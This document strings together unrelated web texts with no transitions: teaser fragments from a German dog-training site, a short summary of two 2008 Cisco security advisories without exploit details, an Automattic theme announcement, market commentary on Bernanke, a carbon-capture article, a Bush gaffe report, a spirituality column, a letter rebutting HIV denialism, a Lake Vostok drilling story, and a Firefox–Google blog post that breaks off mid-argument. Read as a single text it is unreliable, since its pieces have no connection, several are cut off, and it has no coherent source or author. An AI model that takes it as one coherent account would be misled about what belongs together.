Das liegt zumeist nicht an Böswilligkeit und Gleichgültigkeit , sondern daran , dass Hundehalter mit der Welt ihrer Tiere einfach noch nicht vertraut sind .
Diesen eine Hilfestellung zu geben und durch Hinweise und Anregungen zum eigenen Nachdenken anzuregen , auch etliche Erfahrungswerte und Anleitungen weiterzugeben ist das Anliegen von Brave - Hunde.de .
Die Erziehung / Ausbildung ist für den Hund da , nicht für den Besitzer .
Sie soll dem Tier mehr Lebensqualität und Freiraum verschaffen – ganz sicher nicht der Herrschsucht oder Angeberei mancher Menschen Genüge tun .
Sie soll auch dadurch das Hundeleben schöner machen , dass der Hund im Zusammenleben mit seinen Menschen mehr Harmonie erfährt indem er nicht als enervierend sondern als angenehm empfunden wird .
In erster Linie ist der Mensch jedoch für den Hund da und nicht der Hund für den Menschen .
Obwohl man über Letzteres sicher trefflich streiten kann , denn es liegt nun mal in der Natur des Hundes für seine Menschen da zu sein .
Und sich als Mitglied des Ganzen zu empfinden .
Das ist nun mal letztlich die eigentliche Grundlage für alles was wir mit unserem Hund erreichen können .
Hier sind erstmal einige wichtige Inhalte , viele weitere finden Sie links in der Navigation oder über das Suchfeld .
Unter den Haustieren nehmen die Hunde in mehrfacher Hinsicht eine Sonderstellung ein. >
Mehr dazu
ist nicht schwer .
Hunde haben : Manchmal sehr .
Das heißt , es ist >
Mehr dazu
ist im Interesse aller Beteiligten notwendig .
Sie macht das Zusammenleben für beide Seiten erst möglich und >
Mehr dazu
kann jeder , der mit Freude , Verstand und unbefangener Offenheit konsequent vorgeht .
Wer einige >
Mehr dazu
Eine andere Voraussetzung , um seinem Hund eine Lernchance zu geben , ist die eigene innere Sicherheit des Menschen . >
Mehr dazu
Mit
Wut kann man nur zerstören ,
ganz sicher nie irgend etwas Positives erreichen .
>
Mehr dazu
Einen
Hund zu haben , gehört zweifellos zu den schönen Seiten des Lebens .
Damit das auch so bleibt , ist es im Einzelfall >
Mehr dazu
Das Wort Souveränität bezeichnet nicht nur die staatliche Hoheitsgewalt , es ist auch ein Ausdruck , der besagt , dass jemand >
Mehr dazu
Sie müssen Ihren Hund beim Üben ( und auch sonst ) also stets genau beobachten .
Damit Sie seine >
Mehr dazu
Das Hunde- ABC ist eine Mischung aus einem Glossar in dem Bergriffe rund um Hunde erklärt werden und einem Blog .
Die letzten im Hunde - ABC beschriebenen Stichworte :
Cisco released two advisories today , one for a risk of leaving a root account without a password in the Cisco Application Velocity System ( AVS ) and one for a potential DoS ( forced reload ) of the PIX 500 series and the Adaptive Security Appliance ( ASA ) for the Cisco 5500 series .
The AVS prior to version 5.1.0 does n't prompt users to modify the system password during initial config , which potentially leaves you with a privileged account without a password .
The CVS ID for this is CVE - 2008 - 0029 and full details can be found here :
http://www.cisco.com/warp /public/707/cisco-sa-20080123 -avs.shtml
The PIX and ASA are vulnerable to a specifically created packet when they have the TTL decrement feature enabled .
The CVS ID for this is CVE - 2008 - 0028 and full details can be found here :
http://www.cisco.com/warp /public/707/cisco-sa-20080123 -asa.shtml
Introducing Prologue
Update :
We ’ve released a new and improved version of this Prologue theme with real - time notification , threaded conversations , and more — we are calling it P2 .
We ’re fans of Twitter around here , in fact many Automatticians have accounts , but while the format appealed to us it really just whetted our appetite for something more , like a way for each of us to share short messages about what we ’re doing or working on internally , or private messages between groups of folks .
So last week Joseph Scott and Matt Thomas decided to tackle this problem and within a few days they had a new theme for us : Prologue .
Imagine it like a group Twitter .
It ’s best demonstrated with a demo :
If you click on the screenshot above , you ’ll see a live demo blog with some messages from different Automattic folks .
Basically how it works is when someone has the ability to post to a blog they see a short form at the top of the home page with a post box and tags .
There they can post short messages about what they ’re doing .
Below the posting box is a list of everyone ’s latest tweet or message , with their Gravatar next to it .
You can click on an author to see all their messages , or a tag to see all of the messages in a given tag ( which we use for projects ) .
There are RSS feeds for everything : the entire prologue , each author , each tag , and even combination or searches can be subscribed to in your RSS reader .
You can have a custom header to personalize the Prologue for your group , and just like any WordPress.com blog you have advanced privacy options : the blog can be public , public but invisible to search engines , and password - protected ( available only to members ) .
Just like a blog post , each message in the prologue can have comments , and of course each comments thread has its own RSS feed .
( Just like in regular WP . )
As a completely virtual company with no two people in the same place every day , we often have trouble keeping up with each other , so we ’re going to be using a password - protected Prologue that only Automattic employees can access as one of our methods of communication , much like some other companies use Basecamp .
Some folks have suggested that using WordPress , Prologue , and RSS you could create a pretty effective distributed version of Twitter .
This is n’t something we ’re personally interested in , but we ’ve made the theme available as open source under the GPL so if you want to hack around it yourself you ’re welcome to .
For WordPress.com users the theme is available in your “ Presentation ” section .
The staff was in an undisclosed location outside of Oracle , Arizona last week .
I obtained some exclusive paparazzi shots taken by Alex Shiels .
Here ’s
Andy lounging :
Here ’s me kicking people ’s butts at Wii tennis . 😉
Finally here was our training for spammer - wrangling .
NEW YORK ( Reuters ) - Federal Reserve Chairman Ben Bernanke said on Thursday that the U.S. economic outlook had worsened , and more interest rate cuts may be needed .
“ In light of recent changes in the outlook for and the risks to growth , additional policy easing may be necessary , ” Bernanke said in prepared remarks .
“ We stand ready to take substantive additional action as needed to support growth and to provide adequate insurance against downside risks . ”
KEY POINTS : * Bernanke says baseline outlook for 2008 has worsened , downside risks more pronounced * Bernanke says December employment report ‘ disappointing ’ ; mistake to read too much into one report COMMENTS : ALAN RUSKIN , CHIEF INTERNATIONAL STRATEGIST , RBS GREENWICH CAPITAL , GREENWICH , CONNECTICUT :
“ The wires have almost no headlines to counter the dovish headlines .
The headlines pay only mild lip service to inflation pressures in the comment that ‘ Fed to monitor inflation , price expectations ’ , that looks weak in contrast to the headline ‘ Fed paying particular attention ’ to housing ” .
“ This is more evidence that Bernanke remains extremely worried that the credit accelerator feedback from credit to the real economy and back again has begun in earnest .
The mix of Trichet hawkish and Bernanke dovish reinforces the euro / dollar rally though it does not look like it has obvious legs to take out $ 1.4825 immediately . ”
DAVID RESLER , CHIEF ECONOMIST , NOMURA SECURITIES INTERNATIONAL , NEW YORK :
“ It is hardly surprising that he is acknowledging that the economy is facing considerable downside risk , and he is saying incoming information has worsened and the downside risks have become more pronounced .
“ It is probably likely to solidify expectations around what is probably a consensus anyway , which is that the Fed will move 50 basis points ( at the January policy meeting ) .
That is what a lot of people think they will do , and now more people will think that way . ”
ANGEL MATA , MANAGING DIRECTOR OF LISTED EQUITY TRADING , STIFEL NICOLAUS CAPITAL MARKETS , BALTIMORE :
“ Everybody has been waiting for this .
It ’s important for him to lead emotionally as well as lead with rate cuts .
I think he ’s come to terms with the fact that while inflation may be a concern down the road , he has to take care of the train that ’s coming at him right now , which is the fear of a recession .
The market was in a free fall , and he ’s basically given investors hope , and I think you ’ll see a pretty strong rally . ”
STEVE GOLDMAN , MARKET STRATEGIST , WEEDEN & CO. , GREENWICH , CONNECTICUT :
“ This is what the markets were hoping he would say and it qualifies that the Fed will likely cut rates by 50 basis points .
Reaction to these comments is reassuring .
“ He also made some comments that he would be monitoring inflation expectations , not so much inflation , so he ’s trying to look beyond the immediate concerns , and if the outlook is not so alarming then that could give him more leeway . ”
DAVID POWELL , CURRENCY STRATEGIST , IDEAGLOBAL , NEW YORK :
“ It ’s definitely dollar negative and confirms the market ’s view that we ’re going to get 50 basis points of rate cuts in January .
‘ Substantive additional action ’ in particular sounds a lot more like 50 basis points than 25 .
His tone overall is dovish , and that ’s negative for the dollar , positive for equities and a help to high - yielders .
“ When one looks back at Trichet ’s comments , it ’s clear we ’re getting very different tones from the two central bankers .
Trichet said the ECB did n’t even talk about the possibility of easing .
Bernanke is delivering the exact opposite message , and that points to further upside for euro / dollar . ”
Global warming : Can we just stash the carbon dioxide ?
Global warming is the nightmare that just wo n't quit .
Fearing the biggest environmental catastrophe since the ice age , many scientists say the goal of the Kyoto agreement — slowing the increase in greenhouse gas emissions — will not do the job .
Rather , we need to drastically cut dumping carbon dioxide into the atmosphere .
The past weeks have been a good one — at long last — for the gathering struggle against global warming .
There was the symbolism of the Oscar for Al Gore 's movie " An Inconvenient Truth . "
( On Mar. 21 , Gore called global warming a " planetary emergency " in testimony to the U.S. House of Representatives ) .
But there are other signs of new thinking , even in the foot - dragging United States , which remains the largest source of greenhouse gases — and the biggest opponent of cuts in those gases .
Last fall , California passed a landmark law to " cap " carbon dioxide emissions .
Other states are considering similar measures .
Within the past two weeks , " the chief executives of America 's largest automobile companies — General Motors , Ford , Chrysler and Toyota North America — pledged to support mandatory caps on carbon emissions , as long as the caps covered all sectors of the economy , " according to The New York Times ( see # 1 in the bibliography ) .
On March 19 , giant institutional investors met in Washington to press Congress for mandatory controls on carbon dioxide .
" Joining a rising corporate chorus itching to sink money into clean energy projects , big investors will press the U.S. Congress on Monday to pass laws attempting to tackle global warming , " wrote Reuters ( see # 2 in the bibliography ) .
" The dozens of investors include Merrill Lynch , The Capital Group , which manages $ 850 billion in mutual funds , and the California Public Employees Retirement System , the largest U.S. pension fund , said a source at Ceres , a Boston - based coalition of investors and environmentalists . "
Australia , a major source of coal — and big - time greenhouse - gasser — is funding two large pilot plants to store carbon dioxide deep underground .
TXU , a giant Texas utility , scrapped plans for eight coal - fired generators in favor of conservation , efficiency , and underground carbon dioxide storage .
Graphic : IPCC
Taken together , these are promising signs of a new seriousness toward the unpleasant but undeniable truth :
The fuel we burn is cooking our planet by causing the reflection of heat back to the surface .
The scientific community is practically unanimous :
The predicted warming is occurring , and is in full gallop in the Arctic .
A warmer world will see more fires , more droughts , more giant hurricanes , more flooded coastlines , and more environmental refugees .
Maybe you know of another habitable planet in the universe , but we have n't heard the news .
So for now , the smart money says " Take the sure bet : Save the only planet you got . "
To slow global warming , we could use energy more efficiently , switch to non-carbon energy sources like biomass , nuclear , wind and solar , and grow more trees to soak up carbon dioxide .
Courtesy James Hansen , GISS
Burial rights
So here 's another low - carbon idea :
How about bottling carbon dioxide at power plants and burying it ?
Variously called " carbon capture and storage , " " carbon sequestration , " or the " low - carb diet , " this idea may sound too good to be true , but it is gaining traction .
Just this month , American Electric Power Co. , the largest coal - burner in the country , announced an effort to capture and store carbon dioxide from a coal - burning generator in West Virginia ( see # 3 in the bibliography ) .
( Coal is the focus of these storage discussions because it is almost pure carbon , and therefore makes more carbon dioxide per kilowatt - hour than other fuels . )
Experts say geologic storage sites a kilometer or more belowground might be able to hold more than a thousand billion tons of carbon dioxide , and many believe the gas is likely to stay put once it gets belowground .
A done deal ?
So problem solved ?
Not exactly .
Carbon storage remains experimental ; not a single large generating plant is now injecting carbon dioxide .
Underground storage depends on capturing large amounts of carbon dioxide , which is an enormous challenge in its own right .
Smoke at a coal generating plant contains only 13 to 15 percent carbon dioxide , and concentrating , transporting and storing huge tonnages of carbon dioxide could cost a raft of money and a bargeload of extra energy .
Carbon storage is a huge job .
In 2004 , humans produced about 27 billion tons of the waste gas , a number that is rising every year .
A new study from MIT posed the task in these terms : " If 60 percent of the CO2 produced from U.S. coal - based power generation were to be captured and compressed to a liquid for geologic sequestration , its volume would about equal the total U.S. oil consumption of 20 million barrels per day . "
And that 's just for a part of the carbon dioxide from coal - fired generators ...
Global Energy Sources
. Data from MIT
Furthermore , carbon storage is only suitable at large power plants : Nobody will be capturing CO2 behind a train , airplane or scooter .
So the low - carb storage diet will not solve the whole greenhouse warming problem — much of which is rooted in transportation fuels .
Underground truth
Significant carbon storage must await the conclusion of large experiments on cost , technology and environmental impact , during which time hundreds of new coal - powered generators will each begin spewing millions of tons of carbon dioxide each year .
Refitting a plant for carbon capture can be almost as expensive as building a new one , so the sooner carbon capture and storage technology can be proven , the sooner utilities can include the necessary capture equipment .
Speed matters , given the rapid rate of warming .
According to Curtis Oldenburg , of the earth sciences division at Lawrence Berkeley National Laboratory , " We really need to get started at some scale to learn more .
It 's being done in a few places , and so far it looks like everything is fine , but we 'd like to do it in even more places , " and at a much larger scale .
Public acceptance of carbon storage cannot be assured , and there are risks : about 1700 people died in Cameroon in 1986 during a massive outgassing of natural carbon dioxide .
And unless we test for slow leaks , carbon storage could amount to a big waste of energy and money ; a smokescreen rather than a solution to global warming .
Photo by Jack Lockwood , USGS
Finally , governments need to enact a mechanism to persuade or force generators of carbon dioxide to start reducing their emissions , and then to start monitoring the effectiveness of reductions and storage .
Anyone who has witnessed the long , sorry story of Kyoto knows how difficult those negotiations may be .
Scoring for storing
In the face of all these hurdles , why even consider carbon capture and storage ?
Because no single solution will , by itself , stop global warming .
Because carbon storage could preserve some use of those extremely versatile fossil fuels .
And because storage could be cheap : some estimates anticipate a rise of just 2 cents in the cost of a kilowatt hour of electricity .
Now , you could go low - tech and start planting trees , which metabolize carbon dioxide into cellulose and other organic compounds .
But trees eventually burn or decay , releasing the carbon dioxide .
A second low - tech approach is to store more carbon in the soil , which also improves soil fertility and raises crop production .
But land is limited , and trees and soil cannot store the gigatons of carbon dioxide released every year .
And that brings us back to the idea of returning the carbon from fossil fuel back to the Earth , and especially the carbon from coal .
As David Hawkins , a climate expert at the Natural Resources Defense Council , told the New York Times , " Under any plausible scenarios of global coal use , we are going to need carbon dioxide capture and storage . "
Is anybody injecting carbon dioxide deep underground right now ?
Dazed Bush forgets what country he's in , what summit he's at David Edwards and Nick Juliano
Published : Friday September 7 , 2007
Print This Email This Want to get the news the media buries ?
Get Raw headlines in your browser .
President Bush 's trademark struggles with the finer points of public speaking were on full display Friday , when he thanked his " Austrian " hosts for inviting him to this year 's " OPEC " summit .
The " Language Mangler - in - Chief " was in Australia attending the APEC ( Asia - Pacific Economic Cooperation ) summit .
Along with misidentifying his host country and the name of the summit , Bush struggled to leave the lectern , trying to exit the stage the wrong way .
" Thank you for being such a fine host of the OPEC summit , " Bush said to Australian prime minister John Howard .
He quickly corrected himself , " APEC summit , " and joked Howard " invited me to the OPEC summit next year .
( Such an invitation would be impossible because neither the US or Australia are members of the Organization of Petroleum Exporting Countries . )
Later in the speech , Bush can clearly be heard on tape thanking Howard for visiting " Austrian troops " in Iraq last year , but White House scrubbers fixed that gaffe for him , changing the official government transcript to " Australian , " the Associated Press reported .
As Reuters notes , " There are , in fact , no Austrian troops there .
But Australia has about 1,500 Australian military personnel in and around " Iraq .
Bush 's struggles from the lectern did n't end when he stopped talking either .
Press reports indicate he tried to leave the stage through the wrong door , and the Australian prime minister had to point him toward the proper exit , according to the Herald Sun newspaper .
The scene was reminiscent of a 2005 Bush appearance in Beijing , when Bush was thwarted by a locked door after stepping off stage and had to be redirected .
The following video is from MSNBC's Morning Joe , broadcast on September 7 .
It 's a topic that jumped up like a stunned ferret from God 's own hot plate three separate times recently — indicating , I think , that I 'd better pay some sort of attention to it — the topic being the obvious but still desperately under - discussed idea that perhaps the most dangerous problem facing man in this modern age of radical technology and dazzling scientific conundrum and otherworldly raspberry vodka and ever - expanding notions of love and sex and human interconnection is the sad and treacherous fact that , well , religion and belief as we know them in America are , by and large , far too horribly stuck , limited , fixed in time and place and stiff karmic cement .
Put another way :
We as a culture just might be suffering a slow , painful death by spiritual stagnation , by ideological stasis , by cosmic rigor mortis .
It has become painfully , lethally obvious in the age of George W. Bush and authoritarian groupthink that our major religious systems and foundations do n't know how to move .
They do n't learn , adjust , evolve , see things anew .
They do n't know how to dance .
And what 's more , this little problem might just be the death of us all .
The idea is everywhere , and not just in the obvious , sour religious outhouses of evangelical Christianity and fundamentalist Islam and rigid Catholicism .
It even popped up while I was in conversation with tattooed Buddhist and author of " Dharma Punx " Noah Levine at the Roxie theater during LitQuake ' 07 , he and I chatting about the dangers of dogma and the problem of trying to adhere too closely , too severely , to classical Buddhist rules of behavior , concluding that even Buddhism has its dangers , its limits and its issues and general theological potholes .
Levine , a fairly conservative Theravadan Buddhist , admitted that even he had to seriously adjust some of those old rules to make them tolerable and digestible , particularly in regards to how poorly classical Buddhism valued women and the feminine principle ( not to mention other rather impossible dietary and lifestyle restrictions ) , outmoded ideas that sort of make you wince and cringe and say no no no , Buddha could n't really have meant that , could he ?
Ultimately , Levine is much like any other honest , modern Buddhist in that he will see these apparent snags and merely shrug , and then choose what rules and notions from the ancient texts work for him in the modern world .
Arguably , the beautiful thing about Buddhism is that , by and large , it seems to willingly allow for this adaptation , welcomes it and encourages it , in the full understanding that , so long as clear , divine intent is in place , there can be no real threat to the Four Noble Truths , to the honest path .
( Though there is no shortage of strict Buddhist sects who believe their version is the one true way . )
A similar idea came up again as I was sharing the stage with the luminous Sera Beak , author of " The Red Book , " a funky spirituality tome for fiery youngish women , she and I talking to the small crowd over at the Alameda Literati Festival about the hot ideological tongue baths that simply must take place between the divine feminine ( her oeuvre ) and the profane masculine ( mine ?
Sort of ? ) , the idea that you cannot have one without the other and they are both , in fact , required , and it's when you get deluded into thinking there is only one way to see notions of divine and god and sex that you get in serious trouble .
( Full disclosure : I edited her book , so I know her ideas well ) .
It is the notion of fluidity of spirit .
It is the notion that religion and belief , far from the immovable anchors that supposedly give your life deep meaning and sustenance , just might be far better and juicier and healthier for you and your ravenous soul when they do not always give you such firm and inflexible ground upon which to rest your head .
It 's a decidedly Tantric principle , that of a divinely animated , changeable universe , the idea that because we are fluxive and adaptive and ever - evolving species , that perhaps our gods , our doctrines , our belief systems should evolve and adapt with us .
( Here is where you may insert the sounds of screaming from the evangelical Christian and Catholic churches and all Bible literalists , among many others , who generally abhor change and resist the new and fight against all efforts to let the spirit , the flesh , the id truly breathe .
After all , it is only through rigidity and dogma that they have meaning and control .
It is only through the lack of change and the resistance to thinking for yourself that they have any real power .
The poor things . )
It reminds me of the story Beak told me of a scene in the 1998 documentary " The Jew in the Lotus , " in which a group of Jewish delegates traveled to India to meet with the Dalai Lama to discuss serious matters of faith and exile .
During their talks , the Kabbalist ( that is , the mystic ) among them brought up the notion of angels , which instantly enthralled and excited the Dalai Lama , who immediately wanted to discuss them more , to learn and share ideas of wonder and magic ( much to the chagrin of the other , more " serious " delegates ) .
It is , in a way , nothing short of astonishing .
In the face of the horrible suffering of his people , the Dalai Lama was wide open to new possibility ( he 's also hugely interested in the ways new scientific discoveries intersect with faith ) , fresh ways of looking at God , soul , the universe .
Here was the Tibetan people 's most holy leader , an eager sponge for new spiritual information he could use to inspire and transform his faith , his people .
Now , imagine the Pope doing the same thing .
See ? Laughable .
And horribly sad .
And then , finally , the idea sprang up once more , this time in an entirely different , thoroughly wonderful , hyperintelligent mode that I wish I 'd thought of myself but must hereby give credit to the amazing conceptual artist and all - around creative genius Jonathon Keats , and his new show over at Modernism gallery in San Francisco .
Keats has created new miracles for gods .
Which is to say , any deity who might be in need of something new and refreshing and mind - blowing , any sort of supernatural being who might have lost some of his / her luster or exalted status and needs a nice kick - start , may , through the gallery , license any of Keats ' newly developed , miraculous phenomena to enthrall the human species anew .
He has designed seven new and unique solar systems , each available for licensing by any needful deity .
( " The buyer is responsible for construction , and advised to hire a qualified engineer . " )
He has also created " lesser miracles , " including a suite of supernova pyrotechnic displays , designed to " blaze across the heavens for months " and inspire new waves of awe among jaded believers .
There are astral organ works designed to be played on constellations of stars , one of which is now available for free download .
" I 'm sympathetic to deities , who must compete to be noticed , and are constantly at risk of being debunked , " Keats says in a press release .
" I 'm also sympathetic , even more so , to the cynics amongst us who have lost their sense of wonder .
Perhaps awe can be rediscovered through art . "
And there you have it .
Bottom line :
It is through the creative impulse , through imagination and our deep need for mystery , that the gods can truly dance , remain fresh , stay alive and vital and interesting .
It is only through our ability to reinvent them and honor them in new and miraculous ways that humanity will keep afloat and vibrant .
The gods are , after all , our creation .
Why not let our creation tango ?
Mark Morford 's latest book is ' The Daring Spectacle : Adventures in Deviant Journalism ' .
Join Mark on Facebook and Twitter , or email him .
His website is markmorford.com .
For his yoga classes , workshops and retreats , click markmorfordyoga.com .
Mark 's column appears every Wednesday on SFGate , and is frequently cross-posted to Huffington Post .
To join the notification list for this column , click here and remove one article of clothing .
To get on Mark 's personal mailing list , click here and remove three more .
This column also has an RSS feed and a very handy archive page .
Dear Friend :
In recent years , many stories have appeared in the media highlighting the views of individuals who claim that HIV is not the cause of AIDS .
These articles are always " good copy " in the sense that they generate controversy and reader response .
Many AIDS educators and public health officials are concerned , however , that such views , presented without context or challenge , undermine efforts to teach safer sexual behaviors needed for reducing the spread of HIV .
Others fear that they may discourage people from seeking useful treatment available from their doctors and serve to confuse people about important medical matters which may affect their lives in the most profound ways .
Readers of these articles are often impressed with the arguments made .
Without cross examination or knowledge of the underlying scientific questions , readers have very little basis for evaluating what they hear .
In our experience , few of today 's readers have ever had the chance to examine the information which led scientists to conclude that HIV is the cause of AIDS .
Indeed , the promoters of the alternative viewpoint show little awareness of this information and rely instead on their own often distorted data set .
The case for the causality of HIV is largely old news which does n't seem to warrant column space .
Younger readers in particular , because they have never seen the real scientific arguments , are a particularly easy target for those who advocate alternative views .
Unfortunately , it is also a fact that new HIV infections are growing more rapidly among young gay men and young men and women of color and are among the highest ever seen in the history of the epidemic .
The message of the HIV critics is an attractive one to this audience , as it relieves them of the fear of HIV transmission .
The most prominent HIV critic has often openly suggested that condom use and safe sex is a futile and unnecessary gesture .
It is critical that people hear the whole story -- not just the unconventional view .
This is especially true for an age group which gives special value to things which carry the label " alternative . "
To illustrate the seriousness of the issue , we offer a quote from a recent article : " One West Hollywood man who has seen dissenter literature is enthralled with the idea that HIV does not cause AIDS .
" I did test positive , " he says , " but I just tell my partners that I 'm negative . "
This man , who wishes to keep his name as anonymous as his HIV status , also keeps his dissident views private .
" To try to explain everything to someone you 've just met is simply too confusing .
And since HIV is harmless being positive and negative is the same thing . "
He looks up casually , " Is n't it ? " ( True Unbelievers by Stuart Timmons , New Age Journal , November / December 1995 ) .
In light of the fact that yet another book is being released by the HIV critics , we are supplying the attached document for your information .
It is an official summary of the evidence collected over the last 15 years which has lead to the nearly universal consensus that HIV is the primary cause of AIDS ( on the NIH Web Site ) .
It represents the work of hundreds of scientists and references several hundred scientific papers on this matter .
HIV critics make the argument that " there is n't a single scientific paper which proves that HIV is the cause of AIDS . "
In a sense , they are correct .
The argument is made not by a single paper , but by hundreds of them .
We believe this is a serious matter which deserves careful and serious consideration every time it comes up .
We urge you to read this document , as well as to consider the possible consequences if people are mistakenly given the notion that the views for and against HIV causality are in any way equally valid .
As we see it , from a scientific viewpoint , the alternative view is akin to the notion that the earth is flat , or the belief that creationism is somehow a valid alternative to evolutionary science .
Sincerely ,
Martin Delaney
Founding Director , Project Inform
Note : A paper copy with references is available by calling the Project Inform Hotline .
Mysterious Lakes Under Antarctica May Be Threatened Russia is set to drill into underground lakes ; not everyone is happy .
Dec. 5 , 2007  --
Sometime within the next few months , a Russian device may dip into a place where no man has been before .
It wo n't be on another planet , or even the dark side of the moon .
It will be on this planet , in one of Earth 's most austere regions , in a place that has not been disturbed in millions of years .
A Russian drilling rig has penetrated through more than two miles of Antarctic ice and is within about 70 meters of a huge subglacial lake that may harbor microbial colonies that are unlike anything ever seen on Earth .
It 's an exciting time for some scientists , and a matter of concern to others .
Lake Vostok is a huge body of fresh water , about the size of Lake Ontario , that is part of a recently discovered network of at least 150 lakes beneath Antarctica 's massive ice sheets .
The immense pressure of the ice keeps the water in a liquid form .
The lakes are fed by subglacial rivers that pump water throughout an astonishing aquatic system , at least a couple of miles below the top of the ice field .
The rivers and lakes are now thought to play a key role in regulating the flow of Antarctica 's ice sheets toward the ocean .
" The water under the ice sheets is what lubricates the glaciers and controls their movement toward the ocean , " said oceanographer Mahlon " Chuck " Kennicutt II of Texas A&M University in College Station .
Kennicutt is involved in several international programs to explore Antarctica , which , for more than 50 years , has been a model of international cooperation .
A team of scientists reported earlier this year that ice above some of the subglacial lakes was moving at a significant pace , at least a couple of meters a day .
" It 's really ripping along , " Helen Fricker , of the Scripps Institution of Oceanography in San Diego , said at the time .
The problem is that no one knows enough about those giant subsurface aquifers — which seem to be key players in the movement of the ice — to really evaluate their potential impact on Antarctica 's contribution to sea level rise , due to global warming .
In the wake of the recent intergovernmental panel on climate change , " One of the most compelling things is , we really do n't understand what the response of the Antarctic ice sheets will be to global warming , " Kennicutt said in an interview .
" About 90 percent of the world 's fresh water is tied up in these ice sheets , so it 's a major unknown .
How will these ice sheets react to the warming that 's been predicted ? "
And how will any major climate change impact the lakes and rivers beneath the ice , the system 's " lubricant " ?
The National Aeronautics and Space Administration has confirmed that photos from space show a significant link between the flow of ice and the movement of water through some of the subglacial rivers and lakes .
That has added to concerns that Antarctica , which , so far , has been an underachiever in the climate change picture , might change more rapidly than had been expected .
That 's certainly been the case in the Arctic .
Of course , it 's unlikely that a single Russian drilling rig is going to precipitate a sudden melting or movement of Antarctica 's massive ice fields into the sea , thus inundating most of the planet 's coastal regions , but many polar scientists believe the time has come to move forward cautiously .
As for the Russians , they say they have fulfilled the requirements under the international treaty that governs Antarctica , and they are confident their project will do no harm , so there 's nothing anyone can do to stop them .
" At the end of the day , it 's really a national decision by the Russians over whether they go forward , " Kennicutt said .
Scientists are far less worried about triggering an avalanche of disastrous climate changes in Antarctica , than they are about contaminating an environment that is priceless to a number of fields .
NASA is particularly concerned , because the frozen South Pole is considered one of the best areas to practice looking for life in places that are different from the conditions that most of us consider habitable .
Scientists have found life virtually everywhere they 've looked on this planet , and some expect to find life in the pure , untouched freshwater lakes and rivers beneath the ice on Antarctica .
Any attempt to penetrate Lake Vostok , some scientists say , could introduce contaminants that would jeopardize that effort .
It 's safe to say no one expects to find living dinosaurs down there .
But most likely , tiny organisms that have adapted to a unique environment , will have made their home there .
But they could be very vulnerable to any kind of disturbance .
That danger is present in all efforts to explore unknown places , but much has been learned through space exploration , and the threat could be lessened considerably today .
Of course , we left a lot of junk on the moon , so it may be difficult to point a finger at someone else .
Kennicutt , for one , argues that Lake Vostok , by far the largest of the subglacial lakes , should be explored when the time is right .
But he does n't think it 's the right place to start .
" There 's a lot of alternative , less sensitive , places to test the technology , " he said .
It could be done in any number of frozen lakes , answering a number of questions .
Could penetration cause hydro - fracturing of the well hole , leading to something like an uncontrolled oil well blowout ?
The Russian drilling rig was n't designed to penetrate a virgin lake and leave no contamination .
Diesel fuel and Freon are used to maintain the well , so is it possible to penetrate the lake and not also contaminate it ?
The Russians have said they can do it safely , and they have complied with the governing treaty , which has no enforcement provisions .
" The Russians have made this the centerpiece of their Antarctic program , " Kennicutt said .
" This is really now a matter of national pride . "
They were n't the first to get to the moon .
They seem determined to be the first to penetrate Lake Vostok , which blankets about 5,400 square miles directly beneath their research station .
It 's got to be a very juicy plumb .
Lee Dye is a former science writer for the Los Angeles Times .
He now lives in Juneau , Alaska .
Update :
This blog post was edited after receiving complaints from a number of Mozilla employees .
For a list of the edits , go to to the bottom of the post .
The Firefox browser may not be as independent as previously thought .
Mozilla essentially owns Firefox , and it proved so when it flexed its muscles last year in forcing Debian to rename its browser IceWeasel .
However , the open secret in the tech sector is that at the end of the day , Google calls the shots .
As this blog post will explain , when a pro-user security feature in the browser threatens Google 's business model , it is the feature that is made to compromise -- not the search engine .
Sgrah / flickr
First , a few highlights of the Firefox - Google relationship .
Fact : $ 56 million of the $ 66 million that Mozilla made in 2006 came from Google .
The vast majority of this was due to the fact that Google is the default search engine for queries entered into the Firefox search bar .
While Apple also gets a nice chunk of change from Google for the search bar in its Safari browser , Apple has enough other sources of revenue that it can easily walk away from Google 's cash .
Fact : Users who enter keywords or misspelled URLs into the Firefox 2.0 location bar will essentially be running a Google " I'm Feeling Lucky " search .
That is , they will be taken to the first result for a Google search query for those terms .
Fact :
In addition to the Google cash flowing to Mozilla , a number of Google engineers spend significant amounts of time working on Firefox .
This includes Ben Goodger , the former lead developer , and still a major contributor for the browser .
Yes , other companies pay developers to work on Firefox , but none throw as many overall corporate resources at the browser .
Fact :
Two key features of the Google Toolbar for Firefox were rolled into the Firefox 2.0 browser and are turned on by default : Google Browse By Name and Google Safe Browsing for Firefox ( now the Phishing Protection feature in Firefox 2.0 ) .
These two features , while useful , are more than just the application of a useful patch .
They result in millions of Firefox browsers regularly polling Google servers for core information .
Fact : The Google Anti-Phishing relationship will be expanded in Firefox 3.0 .
While Google currently is the default provider of a blacklist of known phishing sites to the browser , this will be enhanced to include a blacklist of sites that serve up malicious software .
Fact : Google pays AdSense publishers ( Web site owners ) $ 1 for each new user who installs Firefox +
Google Toolbar as a result of a referral link from one of their pages .
The fact that Google wants to encourage a standards - compliant alternative to Internet Explorer is logical , and it makes good business sense for the company .
The company 's very ability to make money depends upon users being able to access its various Web - based applications .
If Microsoft controlled 90 percent of the browser market , and it could " accidentally " break Google 's Web sites with a software update , the search giant would be in serious trouble .
lautreamax / flickr
Of course , from the perspective of limiting the chance of government regulation , antitrust actions and any controversy over the company 's acquisitions ( such as with DoubleClick ) , there are some serious strategic advantages to being able to say Firefox is controlled by a bunch of open - source developers -- and that is not taking its orders from the Googleplex .
The close relationship between Google and Mozilla leads to a number of serious conflicts of interest .
The end result is that users ' online privacy and security take a backseat to the protection of Google 's revenue streams .
I will now explore two particularly chilling examples of this conflict of interest .
Ad blocking
The AdBlock Plus Firefox extension is getting to be extremely popular .
It has been featured in The New York Times , and it is regularly included in various " top 10 " lists of Firefox extensions on major blogs and other popular Web sites .
For those of you who have not yet tried it out , AdBlock Plus ( and its essential sidekick , the Filterset G Updater ) completely revolutionizes the Web - browsing experience .
After surfing without ads for the last few years , having to use a public computer without AdBlock Plus is a frustrating , distracting , and unpleasant experience .
While AdBlock Plus is fantastic at getting rid of most banner ads , it does n't do the best job of targeting Google 's text - based advertisements .
This is where another immensely useful extension , CustomizeGoogle , comes in handy .
In addition to blocking Google 's text ads ( on all Web sites , including Google Web properties such as Gmail and Google Calendar ) , the extension also protects user privacy .
With CustomizeGoogle installed , the search engine 's tracking " cookies " are not accepted .
This means that users cannot be tracked across multiple sessions .
They can deny the search engine knowledge of which links a user clicks on from the results page of a search .
